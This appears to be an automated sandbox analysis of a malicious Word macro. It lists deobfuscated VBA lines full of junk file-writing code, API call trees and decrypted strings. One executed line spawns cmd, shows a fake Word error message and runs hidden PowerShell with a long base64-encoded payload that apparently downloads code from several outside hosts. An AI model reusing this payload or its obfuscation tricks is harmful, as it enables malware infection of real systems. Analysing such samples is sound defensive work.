anw[3QAw]anw[3ADM]anw[3AUA]anw[3A7A]anw[3CQA]anw[3SAA]anw[3yAD]anw[3cAW]anw[3AA9]anw[3ACg]anw[3AJw]anw[3BJA]anw[3CcA]anw[3KwA]anw[3oAC]anw[3cAN]anw[3gAn]anw[3ACs]anw[3AJw]anw[3A3A]anw[3FEA]anw[3JwA]anw[3pAC]anw[3kAO]anw[3wAg]anw[3ACA]anw[3AKA]anw[3BnA]anw[3GkA]anw[3IAA]anw[3oAC]anw[3IAV]anw[3gBh]anw[3AFI]anw[3AIg]anw[3ArA]anw[3CIA]anw[3aQB]anw[3BAE]anw[3IAT]anw[3ABl]anw[3ADo]anw[3Aaw]anw[3AiA]anw[3CsA]anw[3IgA]anw[30AD]anw[3cAZ]anw[3AAi]anw[3ACk]anw[3AIA]anw[3AgA]anw[3CkA]anw[3LgB]anw[32AG]anw[3EAT]anw[3AB1]anw[3AGU]anw[3AOg]anw[3A6A]anw[3CIA]anw[3QwB]anw[3yAE]anw[3UAY]anw[3ABB]anw[3AGA]anw[3AVA]anw[3BgA]anw[3EUA]anw[3RAB]anw[3JAF]anw[3IAZ]anw[3QBD]anw[3AFQ]anw[3AYA]anw[3BPA]anw[3FIA]anw[3eQA]anw[3iAC]anw[3gAJ]anw[3ABI]anw[3AE8]anw[3ATQ]anw[3BFA]anw[3CAA]anw[3KwA]anw[3) -> 17689 executed
135	Goto sCOIGDtD
136	Dim eepvDEaE as Object
137	Set jzqBlGW = lBenBDA	lBenBDA
138	Set eepvDEaE = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
139	Dim sCOIGDtD as Object
140	Set sCOIGDtD = eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")	CreateTextFile
141	sCOIGDtD.WriteLine "JTSPCDjykfL"	WriteLine
142	sCOIGDtD.WriteLine "bBmgOCvPPojGGC"	WriteLine
143	sCOIGDtD.WriteLine "anBQXljzGenE"	WriteLine
144	Set tAmQHxlD = UavHTIBHo	UavHTIBHo
145	sCOIGDtD.Close	Close
146	Set eepvDEaE = Nothing
147	Set gphNDVZp = IcAHwPH	IcAHwPH
148	Set sCOIGDtD = Nothing
148	sCOIGDtD:
150	Goto fmwdEMADQ
151	Dim DkLoDL as Object
152	Set plqkuDI = BNmrm	BNmrm
153	Set DkLoDL = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
154	Dim fmwdEMADQ as Object
155	Set fmwdEMADQ = DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")	CreateTextFile
156	fmwdEMADQ.WriteLine "dnUnKFHAkIOdD"	WriteLine
157	fmwdEMADQ.WriteLine "ekluIEBJFIgoBcGC"	WriteLine
158	fmwdEMADQ.WriteLine "BnxHFzJCGhVHrFIm"	WriteLine
159	Set jPJENIo = FLtYjKHC	FLtYjKHC
160	fmwdEMADQ.Close	Close
161	Set DkLoDL = Nothing
162	Set ANzGyzCD = qAUhkIMz	qAUhkIMz
163	Set fmwdEMADQ = Nothing
163	fmwdEMADQ:
165	Mwzin4vxc1irit.Create Jlda77h_v8nx5(Jaaqx1xn5daotw), V2enhc4htwl7z6bh, Thriap3q9rgf3yy9y	SWbemObjectEx.Create("cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArACgAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgA,,) -> 0 V2enhc4htwl7z6bh Thriap3q9rgf3yy9y executed
166	Goto pkixJADG
167	Dim DhnHIY as Object
168	Set oQgLUI = zZuzBZGD	zZuzBZGD
169	Set DhnHIY = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
170	Dim pkixJADG as Object
171	Set pkixJADG = DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")	CreateTextFile
172	pkixJADG.WriteLine "fDdPHEjBEnAdZqZFJ"	WriteLine
173	pkixJADG.WriteLine "wypNISsWSXthFJCq"	WriteLine
174	pkixJADG.WriteLine "LvnHAGHfIhRDBRAF"	WriteLine
175	Set ecGmY = OIbfvEEFF	OIbfvEEFF
176	pkixJADG.Close	Close
177	Set DhnHIY = Nothing
178	Set EKmLA = eLmLDU	eLmLDU
179	Set pkixJADG = Nothing
179	pkixJADG:
181	Goto KmGOADt
182	Dim CFdSBD as Object
183	Set nhLeJMLfI = FYVZFEH	FYVZFEH
184	Set CFdSBD = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
185	Dim KmGOADt as Object
186	Set KmGOADt = CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")	CreateTextFile
187	KmGOADt.WriteLine "DBvMcNtCcMyJDDI"	WriteLine
188	KmGOADt.WriteLine "eXpjHFapHaPdRJu"	WriteLine
189	KmGOADt.WriteLine "eXObOTlBAITEOIo"	WriteLine
190	Set STzBjwICv = hoyzuBGCP	hoyzuBGCP
191	KmGOADt.Close	Close
192	Set CFdSBD = Nothing
193	Set ORLICIl = lADFBaJ	lADFBaJ
194	Set KmGOADt = Nothing
194	KmGOADt:
196	End Function

Function Jlda77h_v8nx5, APIs: 201, Strings: 20, Number of lines: 66, Relevance: 388.566

APIs	Meta Information
SQQWY
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
ddanFDWJf
Close
RhztCF
kwzjKvZHe
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
inIcjJtaF
Close
zBSWCKmJv
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: Pg5minli2d3c9
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: sreXHFD
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: CreateObject
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: WriteLine
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: WriteLine
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: WriteLine
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: eCIzUDyJ
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: Close
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: yJmmmVIAG
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: Replace
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: Ij2hesgjee57d3s0
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: uVItICICB
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: CreateObject
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: WriteLine
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: WriteLine
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: WriteLine
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: anyPG
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: Close
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: YVZXECEHD
KXTliE
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
YZllAeRe
Close
hjZwD
FUyIHBDFz
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
AiRdGDAJ
Close
AioOpBFE

Strings	Decrypted Strings
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"OiBXGJB:\pnqsZEDV\gsZoAW.EePnB"
"eEWdaDQVJJqTHgF"
"OyFBLhlWUnD"
"TBKmUCEXTUIGu"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"OBoYzRpef:\sDLuJ\bmIQSG.MdmDR"
"NeiIGCNWgICn"
"EgxfIDVQbJotWhj"
"UjBKOEDRIbiWFB"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD"
"RhnJRGeBNASBQHHGF"
"WNFUDvHgghFdup"
"eeVVJBMGlcfXMB"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC"
"ptABFEZDmkMVIeD"
"vVbvIHcFGEAJJ"
"NisSEYrcDlKQUITa"

Line	Instruction	Meta Information
197	Function Jlda77h_v8nx5(Wwsqkhmtfcf3_y)
198	On Error Resume Next	executed
199	Goto PbhYVsA
200	Dim PcHRGIADo as Object
201	Set TXmxvp = SQQWY	SQQWY SQQWY SQQWY SQQWY SQQWY
202	Set PcHRGIADo = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject CreateObject CreateObject CreateObject CreateObject
203	Dim PbhYVsA as Object
204	Set PbhYVsA = PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")	CreateTextFile CreateTextFile CreateTextFile CreateTextFile CreateTextFile
205	PbhYVsA.WriteLine "eEWdaDQVJJqTHgF"	WriteLine WriteLine WriteLine WriteLine WriteLine
206	PbhYVsA.WriteLine "OyFBLhlWUnD"	WriteLine WriteLine WriteLine WriteLine WriteLine
207	PbhYVsA.WriteLine "TBKmUCEXTUIGu"	WriteLine WriteLine WriteLine WriteLine WriteLine
208	Set qHKYGHlFA = ddanFDWJf	ddanFDWJf ddanFDWJf ddanFDWJf ddanFDWJf ddanFDWJf
209	PbhYVsA.Close	Close Close Close Close Close
210	Set PcHRGIADo = Nothing
211	Set sPkIwu = RhztCF	RhztCF RhztCF RhztCF RhztCF RhztCF
212	Set PbhYVsA = Nothing
212	PbhYVsA:
214	Gqzsjl136wugk27i9 = Wwsqkhmtfcf3_y
215	Goto NuebA
216	Dim sTzDC as Object
217	Set GIAKA = kwzjKvZHe	kwzjKvZHe kwzjKvZHe kwzjKvZHe kwzjKvZHe kwzjKvZHe
218	Set sTzDC = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject CreateObject CreateObject CreateObject CreateObject
219	Dim NuebA as Object
220	Set NuebA = sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")	CreateTextFile CreateTextFile CreateTextFile CreateTextFile CreateTextFile
221	NuebA.WriteLine "NeiIGCNWgICn"	WriteLine WriteLine WriteLine WriteLine WriteLine
222	NuebA.WriteLine "EgxfIDVQbJotWhj"	WriteLine WriteLine WriteLine WriteLine WriteLine
223	NuebA.WriteLine "UjBKOEDRIbiWFB"	WriteLine WriteLine WriteLine WriteLine WriteLine
224	Set idbaDIr = inIcjJtaF	inIcjJtaF inIcjJtaF inIcjJtaF inIcjJtaF inIcjJtaF
